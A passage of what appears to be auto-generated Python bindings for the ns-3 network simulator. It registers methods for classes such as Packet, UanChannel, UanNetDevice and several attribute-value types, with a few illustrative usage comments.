## packet.h (module 'network'): uint32_t ns3::Packet::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::GetSize() const [member function]
cls.add_method('GetSize',
'uint32_t',
[],
is_const=True)
## packet.h (module 'network'): uint64_t ns3::Packet::GetUid() const [member function]
cls.add_method('GetUid',
'uint64_t',
[],
is_const=True)
## packet.h (module 'network'): uint8_t const * ns3::Packet::PeekData() const [member function]
cls.add_method('PeekData',
'uint8_t const *',
[],
deprecated=True, is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::PeekHeader(ns3::Header & header) const [member function]
cls.add_method('PeekHeader',
'uint32_t',
[param('ns3::Header &', 'header')],
is_const=True)
## packet.h (module 'network'): bool ns3::Packet::PeekPacketTag(ns3::Tag & tag) const [member function]
cls.add_method('PeekPacketTag',
'bool',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::PeekTrailer(ns3::Trailer & trailer) [member function]
cls.add_method('PeekTrailer',
'uint32_t',
[param('ns3::Trailer &', 'trailer')])
## packet.h (module 'network'): void ns3::Packet::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::PrintByteTags(std::ostream & os) const [member function]
cls.add_method('PrintByteTags',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::PrintPacketTags(std::ostream & os) const [member function]
cls.add_method('PrintPacketTags',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::RemoveAllByteTags() [member function]
cls.add_method('RemoveAllByteTags',
'void',
[])
## packet.h (module 'network'): void ns3::Packet::RemoveAllPacketTags() [member function]
cls.add_method('RemoveAllPacketTags',
'void',
[])
## packet.h (module 'network'): void ns3::Packet::RemoveAtEnd(uint32_t size) [member function]
cls.add_method('RemoveAtEnd',
'void',
[param('uint32_t', 'size')])
## packet.h (module 'network'): void ns3::Packet::RemoveAtStart(uint32_t size) [member function]
cls.add_method('RemoveAtStart',
'void',
[param('uint32_t', 'size')])
## packet.h (module 'network'): uint32_t ns3::Packet::RemoveHeader(ns3::Header & header) [member function]
cls.add_method('RemoveHeader',
'uint32_t',
[param('ns3::Header &', 'header')])
## packet.h (module 'network'): bool ns3::Packet::RemovePacketTag(ns3::Tag & tag) [member function]
cls.add_method('RemovePacketTag',
'bool',
[param('ns3::Tag &', 'tag')])
## packet.h (module 'network'): uint32_t ns3::Packet::RemoveTrailer(ns3::Trailer & trailer) [member function]
cls.add_method('RemoveTrailer',
'uint32_t',
[param('ns3::Trailer &', 'trailer')])
## packet.h (module 'network'): uint32_t ns3::Packet::Serialize(uint8_t * buffer, uint32_t maxSize) const [member function]
cls.add_method('Serialize',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::SetNixVector(ns3::Ptr<ns3::NixVector> arg0) [member function]
cls.add_method('SetNixVector',
'void',
[param('ns3::Ptr< ns3::NixVector >', 'arg0')])
return
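# Usage sketch for the Packet binding registered above (illustrative only):
#
#   p = ns3.Packet(100)                # 100 zero-filled payload bytes
#   size = p.GetSize()
#   frag = p.CreateFragment(0, 10)     # first 10 bytes as a new packet
#   copy = p.Copy()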
def register_Ns3ParetoRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ParetoRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::ParetoRandomVariable::ParetoRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetMean() const [member function]
cls.add_method('GetMean',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetShape() const [member function]
cls.add_method('GetShape',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetBound() const [member function]
cls.add_method('GetBound',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetValue(double mean, double shape, double bound) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'mean'), param('double', 'shape'), param('double', 'bound')])
## random-variable-stream.h (module 'core'): uint32_t ns3::ParetoRandomVariable::GetInteger(uint32_t mean, uint32_t shape, uint32_t bound) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'mean'), param('uint32_t', 'shape'), param('uint32_t', 'bound')])
## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::ParetoRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3PointerChecker_methods(root_module, cls):
## pointer.h (module 'core'): ns3::PointerChecker::PointerChecker() [constructor]
cls.add_constructor([])
## pointer.h (module 'core'): ns3::PointerChecker::PointerChecker(ns3::PointerChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PointerChecker const &', 'arg0')])
## pointer.h (module 'core'): ns3::TypeId ns3::PointerChecker::GetPointeeTypeId() const [member function]
cls.add_method('GetPointeeTypeId',
'ns3::TypeId',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3PointerValue_methods(root_module, cls):
## pointer.h (module 'core'): ns3::PointerValue::PointerValue(ns3::PointerValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PointerValue const &', 'arg0')])
## pointer.h (module 'core'): ns3::PointerValue::PointerValue() [constructor]
cls.add_constructor([])
## pointer.h (module 'core'): ns3::PointerValue::PointerValue(ns3::Ptr<ns3::Object> object) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::Object >', 'object')])
## pointer.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::PointerValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## pointer.h (module 'core'): bool ns3::PointerValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## pointer.h (module 'core'): ns3::Ptr<ns3::Object> ns3::PointerValue::GetObject() const [member function]
cls.add_method('GetObject',
'ns3::Ptr< ns3::Object >',
[],
is_const=True)
## pointer.h (module 'core'): std::string ns3::PointerValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## pointer.h (module 'core'): void ns3::PointerValue::SetObject(ns3::Ptr<ns3::Object> object) [member function]
cls.add_method('SetObject',
'void',
[param('ns3::Ptr< ns3::Object >', 'object')])
return
def register_Ns3TimeChecker_methods(root_module, cls):
## nstime.h (module 'core'): ns3::TimeChecker::TimeChecker() [constructor]
cls.add_constructor([])
## nstime.h (module 'core'): ns3::TimeChecker::TimeChecker(ns3::TimeChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TimeChecker const &', 'arg0')])
return
def register_Ns3TimeValue_methods(root_module, cls):
## nstime.h (module 'core'): ns3::TimeValue::TimeValue() [constructor]
cls.add_constructor([])
## nstime.h (module 'core'): ns3::TimeValue::TimeValue(ns3::TimeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TimeValue const &', 'arg0')])
## nstime.h (module 'core'): ns3::TimeValue::TimeValue(ns3::Time const & value) [constructor]
cls.add_constructor([param('ns3::Time const &', 'value')])
## nstime.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TimeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## nstime.h (module 'core'): bool ns3::TimeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## nstime.h (module 'core'): ns3::Time ns3::TimeValue::Get() const [member function]
cls.add_method('Get',
'ns3::Time',
[],
is_const=True)
## nstime.h (module 'core'): std::string ns3::TimeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## nstime.h (module 'core'): void ns3::TimeValue::Set(ns3::Time const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Time const &', 'value')])
return
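# Usage sketch for the TimeValue wrapper registered above (illustrative; assumes
# the usual ns3.Seconds helper from the core bindings):
#
#   tv = ns3.TimeValue(ns3.Seconds(1.5))
#   t = tv.Get()                       # -> ns3.Time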
def register_Ns3TypeIdChecker_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker(ns3::TypeIdChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdChecker const &', 'arg0')])
return
def register_Ns3TypeIdValue_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeIdValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdValue const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeId const & value) [constructor]
cls.add_constructor([param('ns3::TypeId const &', 'value')])
## type-id.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TypeIdValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): bool ns3::TypeIdValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeIdValue::Get() const [member function]
cls.add_method('Get',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeIdValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): void ns3::TypeIdValue::Set(ns3::TypeId const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::TypeId const &', 'value')])
return
def register_Ns3UanChannel_methods(root_module, cls):
## uan-channel.h (module 'uan'): ns3::UanChannel::UanChannel(ns3::UanChannel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanChannel const &', 'arg0')])
## uan-channel.h (module 'uan'): ns3::UanChannel::UanChannel() [constructor]
cls.add_constructor([])
## uan-channel.h (module 'uan'): void ns3::UanChannel::AddDevice(ns3::Ptr<ns3::UanNetDevice> dev, ns3::Ptr<ns3::UanTransducer> trans) [member function]
cls.add_method('AddDevice',
'void',
[param('ns3::Ptr< ns3::UanNetDevice >', 'dev'), param('ns3::Ptr< ns3::UanTransducer >', 'trans')])
## uan-channel.h (module 'uan'): void ns3::UanChannel::Clear() [member function]
cls.add_method('Clear',
'void',
[])
## uan-channel.h (module 'uan'): ns3::Ptr<ns3::NetDevice> ns3::UanChannel::GetDevice(uint32_t i) const [member function]
cls.add_method('GetDevice',
'ns3::Ptr< ns3::NetDevice >',
[param('uint32_t', 'i')],
is_const=True, is_virtual=True)
## uan-channel.h (module 'uan'): uint32_t ns3::UanChannel::GetNDevices() const [member function]
cls.add_method('GetNDevices',
'uint32_t',
[],
is_const=True, is_virtual=True)
## uan-channel.h (module 'uan'): double ns3::UanChannel::GetNoiseDbHz(double fKhz) [member function]
cls.add_method('GetNoiseDbHz',
'double',
[param('double', 'fKhz')])
## uan-channel.h (module 'uan'): static ns3::TypeId ns3::UanChannel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-channel.h (module 'uan'): void ns3::UanChannel::SetNoiseModel(ns3::Ptr<ns3::UanNoiseModel> noise) [member function]
cls.add_method('SetNoiseModel',
'void',
[param('ns3::Ptr< ns3::UanNoiseModel >', 'noise')])
## uan-channel.h (module 'uan'): void ns3::UanChannel::SetPropagationModel(ns3::Ptr<ns3::UanPropModel> prop) [member function]
cls.add_method('SetPropagationModel',
'void',
[param('ns3::Ptr< ns3::UanPropModel >', 'prop')])
## uan-channel.h (module 'uan'): void ns3::UanChannel::TxPacket(ns3::Ptr<ns3::UanTransducer> src, ns3::Ptr<ns3::Packet> packet, double txPowerDb, ns3::UanTxMode txmode) [member function]
cls.add_method('TxPacket',
'void',
[param('ns3::Ptr< ns3::UanTransducer >', 'src'), param('ns3::Ptr< ns3::Packet >', 'packet'), param('double', 'txPowerDb'), param('ns3::UanTxMode', 'txmode')])
## uan-channel.h (module 'uan'): void ns3::UanChannel::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
return
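# Usage sketch for the UanChannel binding registered above (illustrative; 'prop'
# and 'noise' stand for previously created UanPropModel/UanNoiseModel objects):
#
#   channel = ns3.UanChannel()
#   channel.SetPropagationModel(prop)
#   channel.SetNoiseModel(noise)
#   nDev = channel.GetNDevices()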
def register_Ns3UanModesListChecker_methods(root_module, cls):
## uan-tx-mode.h (module 'uan'): ns3::UanModesListChecker::UanModesListChecker() [constructor]
cls.add_constructor([])
## uan-tx-mode.h (module 'uan'): ns3::UanModesListChecker::UanModesListChecker(ns3::UanModesListChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanModesListChecker const &', 'arg0')])
return
def register_Ns3UanModesListValue_methods(root_module, cls):
## uan-tx-mode.h (module 'uan'): ns3::UanModesListValue::UanModesListValue() [constructor]
cls.add_constructor([])
## uan-tx-mode.h (module 'uan'): ns3::UanModesListValue::UanModesListValue(ns3::UanModesListValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanModesListValue const &', 'arg0')])
## uan-tx-mode.h (module 'uan'): ns3::UanModesListValue::UanModesListValue(ns3::UanModesList const & value) [constructor]
cls.add_constructor([param('ns3::UanModesList const &', 'value')])
## uan-tx-mode.h (module 'uan'): ns3::Ptr<ns3::AttributeValue> ns3::UanModesListValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## uan-tx-mode.h (module 'uan'): bool ns3::UanModesListValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## uan-tx-mode.h (module 'uan'): ns3::UanModesList ns3::UanModesListValue::Get() const [member function]
cls.add_method('Get',
'ns3::UanModesList',
[],
is_const=True)
## uan-tx-mode.h (module 'uan'): std::string ns3::UanModesListValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## uan-tx-mode.h (module 'uan'): void ns3::UanModesListValue::Set(ns3::UanModesList const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::UanModesList const &', 'value')])
return
def register_Ns3UanNetDevice_methods(root_module, cls):
## uan-net-device.h (module 'uan'): ns3::UanNetDevice::UanNetDevice(ns3::UanNetDevice const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanNetDevice const &', 'arg0')])
## uan-net-device.h (module 'uan'): ns3::UanNetDevice::UanNetDevice() [constructor]
cls.add_constructor([])
## uan-net-device.h (module 'uan'): void ns3::UanNetDevice::AddLinkChangeCallback(ns3::Callback<void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> callback) [member function]
cls.add_method('AddLinkChangeCallback',
'void',
[param('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'callback')],
is_virtual=True)
## uan-net-device.h (module 'uan'): void ns3::UanNetDevice::Clear() [member function]
cls.add_method('Clear',
'void',
[])
## uan-net-device.h (module 'uan'): ns3::Address ns3::UanNetDevice::GetAddress() const [member function]
cls.add_method('GetAddress',
'ns3::Address',
[],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): ns3::Address ns3::UanNetDevice::GetBroadcast() const [member function]
cls.add_method('GetBroadcast',
'ns3::Address',
[],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): ns3::Ptr<ns3::Channel> ns3::UanNetDevice::GetChannel() const [member function]
cls.add_method('GetChannel',
'ns3::Ptr< ns3::Channel >',
[],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): uint32_t ns3::UanNetDevice::GetIfIndex() const [member function]
cls.add_method('GetIfIndex',
'uint32_t',
[],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): ns3::Ptr<ns3::UanMac> ns3::UanNetDevice::GetMac() const [member function]
cls.add_method('GetMac',
'ns3::Ptr< ns3::UanMac >',
[],
is_const=True)
## uan-net-device.h (module 'uan'): uint16_t ns3::UanNetDevice::GetMtu() const [member function]
cls.add_method('GetMtu',
'uint16_t',
[],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): ns3::Address ns3::UanNetDevice::GetMulticast(ns3::Ipv4Address multicastGroup) const [member function]
cls.add_method('GetMulticast',
'ns3::Address',
[param('ns3::Ipv4Address', 'multicastGroup')],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): ns3::Address ns3::UanNetDevice::GetMulticast(ns3::Ipv6Address addr) const [member function]
cls.add_method('GetMulticast',
'ns3::Address',
[param('ns3::Ipv6Address', 'addr')],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): ns3::Ptr<ns3::Node> ns3::UanNetDevice::GetNode() const [member function]
cls.add_method('GetNode',
'ns3::Ptr< ns3::Node >',
[],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): ns3::Ptr<ns3::UanPhy> ns3::UanNetDevice::GetPhy() const [member function]
cls.add_method('GetPhy',
'ns3::Ptr< ns3::UanPhy >',
[],
is_const=True)
## uan-net-device.h (module 'uan'): ns3::Ptr<ns3::UanTransducer> ns3::UanNetDevice::GetTransducer() const [member function]
cls.add_method('GetTransducer',
'ns3::Ptr< ns3::UanTransducer >',
[],
is_const=True)
## uan-net-device.h (module 'uan'): static ns3::TypeId ns3::UanNetDevice::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-net-device.h (module 'uan'): bool ns3::UanNetDevice::IsBridge() const [member function]
cls.add_method('IsBridge',
'bool',
[],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): bool ns3::UanNetDevice::IsBroadcast() const [member function]
cls.add_method('IsBroadcast',
'bool',
[],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): bool ns3::UanNetDevice::IsLinkUp() const [member function]
cls.add_method('IsLinkUp',
'bool',
[],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): bool ns3::UanNetDevice::IsMulticast() const [member function]
cls.add_method('IsMulticast',
'bool',
[],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): bool ns3::UanNetDevice::IsPointToPoint() const [member function]
cls.add_method('IsPointToPoint',
'bool',
[],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): bool ns3::UanNetDevice::NeedsArp() const [member function]
cls.add_method('NeedsArp',
'bool',
[],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): bool ns3::UanNetDevice::Send(ns3::Ptr<ns3::Packet> packet, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('Send',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_virtual=True)
## uan-net-device.h (module 'uan'): bool ns3::UanNetDevice::SendFrom(ns3::Ptr<ns3::Packet> packet, ns3::Address const & source, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('SendFrom',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'source'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_virtual=True)
## uan-net-device.h (module 'uan'): void ns3::UanNetDevice::SetAddress(ns3::Address address) [member function]
cls.add_method('SetAddress',
'void',
[param('ns3::Address', 'address')],
is_virtual=True)
## uan-net-device.h (module 'uan'): void ns3::UanNetDevice::SetChannel(ns3::Ptr<ns3::UanChannel> channel) [member function]
cls.add_method('SetChannel',
'void',
[param('ns3::Ptr< ns3::UanChannel >', 'channel')])
## uan-net-device.h (module 'uan'): void ns3::UanNetDevice::SetIfIndex(uint32_t const index) [member function]
cls.add_method('SetIfIndex',
'void',
[param('uint32_t const', 'index')],
is_virtual=True)
## uan-net-device.h (module 'uan'): void ns3::UanNetDevice::SetMac(ns3::Ptr<ns3::UanMac> mac) [member function]
cls.add_method('SetMac',
'void',
[param('ns3::Ptr< ns3::UanMac >', 'mac')])
## uan-net-device.h (module 'uan'): bool ns3::UanNetDevice::SetMtu(uint16_t const mtu) [member function]
cls.add_method('SetMtu',
'bool',
[param('uint16_t const', 'mtu')],
is_virtual=True)
## uan-net-device.h (module 'uan'): void ns3::UanNetDevice::SetNode(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('SetNode',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')],
is_virtual=True)
## uan-net-device.h (module 'uan'): void ns3::UanNetDevice::SetPhy(ns3::Ptr<ns3::UanPhy> phy) [member function]
cls.add_method('SetPhy',
'void',
[param('ns3::Ptr< ns3::UanPhy >', 'phy')])
## uan-net-device.h (module 'uan'): void ns3::UanNetDevice::SetPromiscReceiveCallback(ns3::Callback<bool,ns3::Ptr<ns3::NetDevice>,ns3::Ptr<const ns3::Packet>,short unsigned int,const ns3::Address&,const ns3::Address&,ns3::NetDevice::PacketType,ns3::empty,ns3::empty,ns3::empty> cb) [member function]
cls.add_method('SetPromiscReceiveCallback',
'void',
[param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, short unsigned int, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_virtual=True)
## uan-net-device.h (module 'uan'): void ns3::UanNetDevice::SetReceiveCallback(ns3::Callback<bool, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetReceiveCallback',
'void',
[param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_virtual=True)
## uan-net-device.h (module 'uan'): void ns3::UanNetDevice::SetSleepMode(bool sleep) [member function]
cls.add_method('SetSleepMode',
'void',
[param('bool', 'sleep')])
## uan-net-device.h (module 'uan'): void ns3::UanNetDevice::SetTransducer(ns3::Ptr<ns3::UanTransducer> trans) [member function]
cls.add_method('SetTransducer',
'void',
[param('ns3::Ptr< ns3::UanTransducer >', 'trans')])
## uan-net-device.h (module 'uan'): bool ns3::UanNetDevice::SupportsSendFrom() const [member function]
cls.add_method('SupportsSendFrom',
'bool',
[],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): void ns3::UanNetDevice::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
## uan-net-device.h (module 'uan'): void ns3::UanNetDevice::ForwardUp(ns3::Ptr<ns3::Packet> pkt, ns3::UanAddress const & src) [member function]
cls.add_method('ForwardUp',
'void',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('ns3::UanAddress const &', 'src')],
visibility='private', is_virtual=True)
return
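# Usage sketch wiring up the UanNetDevice registered above (illustrative; 'phy',
# 'mac', 'trans' and 'channel' stand for previously created UAN objects, and
# 'node' for an existing ns3.Node):
#
#   dev = ns3.UanNetDevice()
#   dev.SetPhy(phy)
#   dev.SetMac(mac)
#   dev.SetTransducer(trans)
#   dev.SetChannel(channel)
#   node.AddDevice(dev)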
def register_Ns3UintegerValue_methods(root_module, cls):
## uinteger.h (module 'core'): ns3::UintegerValue::UintegerValue() [constructor]
cls.add_constructor([])
## uinteger.h (module 'core'): ns3::UintegerValue::UintegerValue(ns3::UintegerValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UintegerValue const &', 'arg0')])
## uinteger.h (module 'core'): ns3::UintegerValue::UintegerValue(uint64_t const & value) [constructor]
cls.add_constructor([param('uint64_t const &', 'value')])
## uinteger.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::UintegerValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## uinteger.h (module 'core'): bool ns3::UintegerValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## uinteger.h (module 'core'): uint64_t ns3::UintegerValue::Get() const [member function]
cls.add_method('Get',
'uint64_t',
[],
is_const=True)
## uinteger.h (module 'core'): std::string ns3::UintegerValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## uinteger.h (module 'core'): void ns3::UintegerValue::Set(uint64_t const & value) [member function]
cls.add_method('Set',
'void',
[param('uint64_t const &', 'value')])
return
def register_Ns3Vector2DChecker_methods(root_module, cls):
## vector.h (module 'core'): ns3::Vector2DChecker::Vector2DChecker() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector2DChecker::Vector2DChecker(ns3::Vector2DChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector2DChecker const &', 'arg0')])
return
def register_Ns3Vector2DValue_methods(root_module, cls):
## vector.h (module 'core'): ns3::Vector2DValue::Vector2DValue() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector2DValue::Vector2DValue(ns3::Vector2DValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector2DValue const &', 'arg0')])
## vector.h (module 'core'): ns3::Vector2DValue::Vector2DValue(ns3::Vector2D const & value) [constructor]
cls.add_constructor([param('ns3::Vector2D const &', 'value')])
## vector.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::Vector2DValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## vector.h (module 'core'): bool ns3::Vector2DValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## vector.h (module 'core'): ns3::Vector2D ns3::Vector2DValue::Get() const [member function]
cls.add_method('Get',
'ns3::Vector2D',
[],
is_const=True)
## vector.h (module 'core'): std::string ns3::Vector2DValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## vector.h (module 'core'): void ns3::Vector2DValue::Set(ns3::Vector2D const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Vector2D const &', 'value')])
return
def register_Ns3Vector3DChecker_methods(root_module, cls):
## vector.h (module 'core'): ns3::Vector3DChecker::Vector3DChecker() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector3DChecker::Vector3DChecker(ns3::Vector3DChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector3DChecker const &', 'arg0')])
return
def register_Ns3Vector3DValue_methods(root_module, cls):
## vector.h (module 'core'): ns3::Vector3DValue::Vector3DValue() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector3DValue::Vector3DValue(ns3::Vector3DValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector3DValue const &', 'arg0')])
## vector.h (module 'core'): ns3::Vector3DValue::Vector3DValue(ns3::Vector3D const & value) [constructor]
cls.add_constructor([param('ns3::Vector3D const &', 'value')])
## vector.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::Vector3DValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## vector.h (module 'core'): bool ns3::Vector3DValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
